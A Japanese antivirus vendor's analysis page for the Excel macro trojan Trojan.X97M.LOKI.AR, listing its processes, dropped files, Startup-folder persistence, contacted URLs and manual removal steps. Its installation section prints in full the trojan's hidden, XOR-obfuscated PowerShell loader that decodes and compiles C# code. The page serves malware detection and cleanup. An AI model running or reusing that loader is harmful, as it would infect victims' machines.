Trojan.X97M.LOKI.AR

2020年1月23日

プラットフォーム:

Windows

危険度:

ダメージ度:

感染力:

感染確認数:

マルウェアタイプ: トロイの木馬型
破壊活動の有無: なし
暗号化:
感染報告の有無: はい

概要

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

詳細

ファイルサイズ 182,272 bytes

タイプ XLS

メモリ常駐はい

発見日 2020年1月23日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

powershell -WindowStyle Hidden function x6f8efb {param($gcbc4a3)$kd7236a='qff4c';$g2553='';for ($i=0; $i -lt $gcbc4a3.length;$i+=2){$s5c3d=[convert]::ToByte($gcbc4a3.Substring($i,2),16);$g2553+=[char]($s5c3d -bxor $kd7236a[($i/2)%$kd7236a.length]);}return $g2553;} $sf7db = '04150f5a0451351f4717140b5d41101808011430081512510e5f34135a17180b031a2a1f1203460c0135034615180503475804150f5a0451351f4717140b48700a1001085b10050f05475804150f5a0451351f4717140b487d2c4a13155d0d1646354d1005030b1a2d14125d3969011304580a124605580202154646054003500d050a3d22580f380b165b11054e445f06030803585043444a710d05141f640c180812094136031264111e052750070303154741583b464416130a0f5743021207400a1246034c17141408142a1f12364011511505560512554e7d0d05361246431757530c01424a1540111808011406130005014a4a3d22580f380b165b11054e445f06030803585043444a14261f12144d331e0f0840434c4644780c10022a5d010307144d41583b464416130a0f5743021207400a1246034c17141408142a1f1236401151050557004505511c1005140f5a04510252550042075f1d582a220a582a1c1609461759440d51111f030a0751534a46710d05141f640c1808120941270f144016100a36460c0503054041583b464416130a0f5743021207400a1246034c1714140814011e090a14004003055754104e2f5a172112141412455f520302124a337d0d053612464312075f5200474a46410a1f1246425b4955530d4f5109134043040f084043135754025549054f0f38350a0a7d0e010914404b532d03460d140a55064d150a0a164f51230840110836095d0d055b4466171d2b0942063c030b5b1108444a143014122a5510052314460c035b00550f02034f6943021207400a1246034c1714140814151e0f0214134453525057174e2f5a1721121414141355020055444a2f5a17211214140b430704064f1808121408145f05034a4a1613560f180546471710120f57431808121408460052005b594f1d7d0d0536124643195402030048465b14001205050000464e1e0205490300564b5357560401405353505715575304024107441d4a4a0f001c0b430251575a4c5b2f5a172112141a391414091d181609125b4309575455024a1b2f5a172112141411460507025e0205045200424e0e060746055f181b47005e5105134e440753410457015615555605514151560c544757500554415656075747444f1d5818004e4654120750095e380812641703483c51111e4f1d530c0509464c524307070f1e242f0840330514464456430307094b242f08403305144f0158040f0840430855045606155f5b045818004e15004003055754104e14030010504a44564303071853095256180c0412464d50130403505a584f1d530c0509464c524307070f1e331f1251382c460c505542045b4f5309555718530900001853095f5649583808126417034614035549045b790203150e550f5f270a580c122e21580c13070a1c50585d2b5511020e07584d3209164d4b1b025007015d564a4654475e041850585d160156450252524b1f0311142a1f1236401159145157024748325b2a1f1250004b584d564c534157041d4f0351500c015d554f0f1b405407555951310356201d0f035a175103055055125b08511451310356201d0f035a17594f5d4717030f0853430104525107465e5b710d070f145b0d1c0308404d360312720c1d0203463310120e1c261f100f460c1f0b035a175f3516510018070a720c1d0203464d301616580a1207125d0c1f22074002584d44683f0752540001425f441f1b47005e5105134e440105415557515640444f0f06120250574d3509115a0f1e0702720a1d034e4c55175e0352015944570d524357540057445f5351574857530152405157035346560701544502570653485604050140555701574853520457445052055713535104564502575652475657164a5d1604000615515e1d582114095706021535400203122f5a051e461f075a435202515e1f0311143303090551100235125511052f08520c591604000615515e1d58211409570602154867171014121c1a425f540007144f5d46060513145a43415d1b4416130a0f5743021207400a1246154011180801141b47005e5105134e15401118080114024553070054424f1d4717030f0853431757530c01425b44450517520516580212145d0d1646055700125205035e2212145d0d1648235913051f5d520c034e0f5a17510f5b0458185a070056105251074d3d03085317195d0f1f5e434f1d561a0503464700130005075e3209084206031248600c331f12514b10525355574655486716131512460a1f014e5d4f434f4a0555585d05570012520503484c4e055c02034f4e470013000507432f460005564904556f4b1849541d4354460005564904551a2f140801400b2c4f5d4911141213460d51050557004505510f1e0c'; $sf7db2 = x6f8efb($sf7db); Add-Type -TypeDefinition $sf7db2; [rf1e69f]::k7f448();
"%Windows%\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"%User Temp%\kgjc5w5k.cmdline"
%Application Data%\v424b39.exe
%Windows%\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%User Temp%\RES5CDF.tmp" "%User Temp%\CSC5CBF.tmp"
"%Application Data%\iutmn\etgs.exe"
%System%\lsass.exe

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。. %System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)

マルウェアは、以下のフォルダを作成します。

%Application Data%\iutmn
%Application Data%\737FF7

自動実行方法

マルウェアは、Windows起動時に自動実行されるよう＜User Startup＞フォルダ内に以下のファイルを作成します。

%User Startup%\iutmn.vbs

(註：%User Startup%フォルダは、現在ログオンしているユーザのスタートアップフォルダです。Windows 98およびMEの場合、通常 "C:\Windows\Profiles\＜ユーザ名＞\Start Menu\Programs\Startup" です。Windows NTの場合、通常 "C:\WINNT\Profiles\＜ユーザ名＞\Start Menu\Programs\Startup" です。Windows 2003(32-bit)、XP、2000(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Start Menu\Programs\Startup" です。Windows Vista、7、8、 8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" です。)

作成活動

マルウェアは、以下のファイルを作成します。

%Application Data%\iutmn\etgs.exe:ZoneIdentifier
%User Temp%\kgjc5w5k.0.cs
%System Root%\BVTBin\Tests\installpackage\csilogfile.log
%User Temp%\kgjc5w5k.dll
%User Temp%\kgjc5w5k.err
%Application Data%\v424b39.exe
%Application Data%\737FF7\73A3E3.exe
%User Temp%\27807593.od
%User Temp%\kgjc5w5k.pdb
%User Temp%\kgjc5w5k.cmdline
%Application Data%\iutmn\etgs.exe
%Application Data%\737FF7\73A3E3.lck
{malware file path and name}
%User Temp%\kgjc5w5k.out

(註：%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.)

その他

マルウェアは、以下の不正なWebサイトにアクセスします。

http://{BLOCKED}c.com/pd/2050-11.jpg
http://{BLOCKED}t.com/boot1/pin.php

このウイルス情報は、自動解析システムにより作成されました。

対応方法

対応検索エンジン: 9.850

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

Windowsをセーフモードで再起動します。

[ 詳細 ]

セーフモードでの起動：

• Windows 2000 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows XP の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Server 2003 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Vista、Windows 7 および Windows Server 2008 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「詳細ブートオプション」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows 8、8.1 および Server 2012の場合：

画面の右上隅へマウスポインタを移動し、[チャーム]バーを表示します。
マウスで、[設定]－[PC設定の変更]を選択します。
左側のパネルで、[全般]を選択します。
右側のパネルで、[PCの起動をカスタマイズする]が表示されるまで下にスクロールし、[今すぐ再起動]をクリック。コンピュータが再起動するまで待ちます。
[オプションの選択]メニューで、[トラブルシューティング]－[詳細オプション]－[スタートアップ設定]－[再起動]をクリックします。
[スタートアップ設定]メニューで、[4]キーを押し、「4）セーフモードを有効にする」を選択します。

手順 3

「Trojan.X97M.LOKI.AR」で検出したファイル名を確認し、そのファイルを終了します。

[ 詳細 ]

すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
セーフモードについては、こちらをご参照下さい。
検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

手順 4

以下のファイルを検索し削除します。

[ 詳細 ]

コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。

%Application Data%\iutmn\etgs.exe:ZoneIdentifier
%User Temp%\kgjc5w5k.0.cs
%System Root%\BVTBin\Tests\installpackage\csilogfile.log
%User Temp%\kgjc5w5k.dll
%User Temp%\kgjc5w5k.err
%Application Data%\v424b39.exe
%Application Data%\737FF7\73A3E3.exe
%User Temp%\27807593.od
%User Temp%\kgjc5w5k.pdb
%User Temp%\kgjc5w5k.cmdline
%Application Data%\iutmn\etgs.exe
%Application Data%\737FF7\73A3E3.lck
{malware file path and name}
%User Temp%\kgjc5w5k.out

マルウェアのコンポーネントファイルの削除：

Windows 2000、XP および Server 2003 の場合：

[スタート]-[検索]-[ファイルとフォルダすべて]を選択します。
[ファイル名のすべてまたは一部]に以下のファイル名を入力してください。
%Application Data%\iutmn\etgs.exe:ZoneIdentifier
%User Temp%\kgjc5w5k.0.cs
%System Root%\BVTBin\Tests\installpackage\csilogfile.log
%User Temp%\kgjc5w5k.dll
%User Temp%\kgjc5w5k.err
%Application Data%\v424b39.exe
%Application Data%\737FF7\73A3E3.exe
%User Temp%\27807593.od
%User Temp%\kgjc5w5k.pdb
%User Temp%\kgjc5w5k.cmdline
%Application Data%\iutmn\etgs.exe
%Application Data%\737FF7\73A3E3.lck
{malware file path and name}
%User Temp%\kgjc5w5k.out
[探す場所]の一覧から[マイコンピュータ]を選択し、[検索]を押します。
検索が終了したら、ファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
註：ファイル名の入力欄のタイトルは、Windowsのバージョンによって異なります。（例：ファイルやフォルダ名の検索の場合やファイル名のすべてまたは一部での検索）

Windows Vista、7、Server 2008、8、8.1 および Server 2012 の場合：

Windowsエクスプローラ画面を開きます。
- Windows Vista、7 および Server 2008 の場合：
  - [スタート]-[コンピューター]を選択します。
- Windows 8、8.1 および Server 2012 の場合：
  - 画面の左隅を右クリックし、[エクスプローラー]を選択します。
[コンピューターの検索]に、以下を入力します。
%Application Data%\iutmn\etgs.exe:ZoneIdentifier
%User Temp%\kgjc5w5k.0.cs
%System Root%\BVTBin\Tests\installpackage\csilogfile.log
%User Temp%\kgjc5w5k.dll
%User Temp%\kgjc5w5k.err
%Application Data%\v424b39.exe
%Application Data%\737FF7\73A3E3.exe
%User Temp%\27807593.od
%User Temp%\kgjc5w5k.pdb
%User Temp%\kgjc5w5k.cmdline
%Application Data%\iutmn\etgs.exe
%Application Data%\737FF7\73A3E3.lck
{malware file path and name}
%User Temp%\kgjc5w5k.out
ファイルが表示されたら、そのファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
註：Windows 7 において上記の手順が正しく行われない場合、マイクロソフトのWebサイトをご確認ください。

手順 5

以下のフォルダを検索し削除します。

[ 詳細 ]

フォルダが隠しフォルダ属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。

%Application Data%\iutmn
%Application Data%\737FF7

このマルウェアまたはアドウェア等が作成したフォルダの削除：

Windows 2000、XP および Server 2003 の場合：

[スタート]-[検索]-[ファイルとフォルダすべて]を選択します。
[ファイル名のすべてまたは一部]に、以下のフォルダ名を入力してください。
%Application Data%\iutmn
%Application Data%\737FF7
[探す場所]の一覧から[マイコンピュータ]を選択し、[検索]を押します。
検索が終了したら、フォルダを選択し、SHIFT+DELETE を押します。これにより、フォルダが完全に削除されます。
残りのフォルダに対して、このマルウェアまたはアドウェア等が作成したフォルダの削除の手順 2.）から 4.）を繰り返してください。
%Application Data%\iutmn
%Application Data%\737FF7

註：ファイル名の入力欄のタイトルは、Windowsのバージョンによって異なります。（例：ファイルやフォルダ名の検索の場合やファイル名のすべてまたは一部での検索）

Windows Vista、7、Server 2008、8、8.1 および Server 2012 の場合：

Windowsエクスプローラ画面を開きます。
- Windows Vista、7 および Server 2008 の場合：
  - [スタート]-[コンピューター]を選択します。
- Windows 8、8.1 および Server 2012 の場合：
  - 画面の左隅を右クリックし、[エクスプローラー]を選択します。
[コンピューターの検索]に、以下を入力します。
%Application Data%\iutmn
%Application Data%\737FF7
検索が終了したら、そのファイルを選択し、SHIFT+DELETE を押します。これにより、フォルダが完全に削除されます。
残りのフォルダに対して、このマルウェアまたはアドウェア等が作成したフォルダの削除の手順 2.）から 3.）を繰り返してください。
%Application Data%\iutmn
%Application Data%\737FF7

註：Windows 7 において上記の手順が正しく行われない場合、マイクロソフトのWebサイトをご確認ください。

手順 6

コンピュータを通常モードで再起動し、最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、「Trojan.X97M.LOKI.AR」と検出したファイルの検索を実行してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

ご利用はいかがでしたか？　アンケートにご協力ください